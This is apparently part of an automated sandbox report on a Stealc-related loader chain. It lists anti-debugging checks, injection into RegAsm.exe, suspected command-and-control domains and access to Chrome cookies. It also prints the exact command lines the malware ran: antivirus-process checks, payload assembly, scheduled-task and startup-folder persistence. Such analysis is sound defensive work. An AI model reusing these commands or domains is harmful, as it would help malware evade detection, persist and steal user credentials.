Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_04E10B42 Start: 04E10B4C End: 04E10B51 6_2_04E10B42
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: SIWVID
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_04E10370 rdtsc 6_2_04E10370
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0078AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0078AD48
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_007745C0 VirtualProtect ?,00000004,00000100,00000000 17_2_007745C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00789860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 17_2_00789860
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C8645B mov eax, dword ptr fs:[00000030h] 13_2_00C8645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C8A1C2 mov eax, dword ptr fs:[00000030h] 13_2_00C8A1C2
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00789750 mov eax, dword ptr fs:[00000030h] 17_2_00789750
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00787850 GetProcessHeap,HeapAlloc,GetUserNameA, 17_2_00787850
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0078AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0078AD48
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0078CEEA SetUnhandledExceptionFilter, 17_2_0078CEEA
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_0078B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_0078B33A
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C95AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_6C95AC62
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 4092, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Memory written: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe base: 400000 value starts with: 4D5A
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp String found in binary or memory: scriptyprefej.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp String found in binary or memory: navygenerayk.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp String found in binary or memory: founpiuer.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp String found in binary or memory: necklacedmny.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp String found in binary or memory: thumbystriw.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp String found in binary or memory: fadehairucw.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp String found in binary or memory: crisiwarny.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp String found in binary or memory: presticitpo.store
Source: 550b7cfe5f.exe, 0000002A.00000002.3470804660.0000000000A71000.00000040.00000001.01000000.00000018.sdmp String found in binary or memory: opinieni.store
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: servicedny.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: authorisev.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: faulteyotk.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dilemmadu.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: contemteny.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: goalyfeastz.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: opposezmny.site
Source: GOLD1234.exe, 0000002D.00000002.2747149594.0000000001251000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seallysl.site
Source: RDX123456.exe, 00000030.00000000.2294311234.00000000003C6000.00000002.00000001.01000000.0000001C.sdmp String found in binary or memory: computeryrati.site
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00789600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 17_2_00789600
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 451000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 466000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46D000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46E000
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AF5008
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & echo url="c:\users\user\appdata\local\greentech dynamics\ecocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & exit
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & echo url="c:\users\user\appdata\local\greentech dynamics\ecocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & exit
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C9A4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 17_2_6C9A4760
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C881C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 17_2_6C881C30
Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B82000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000000.2135790083.0000000000336000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: axplong.exe, axplong.exe, 0000000D.00000002.3749945185.0000000000E3A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00C6D312 cpuid 13_2_00C6D312
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 17_2_00787B90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001172001\Set-up.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001172001\Set-up.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00786920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 17_2_00786920
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00787850 GetProcessHeap,HeapAlloc,GetUserNameA, 17_2_00787850
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_00787A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 17_2_00787A30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Code function: 17_2_6C8A8390 NSS_GetVersion, 17_2_6C8A8390
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

barindex
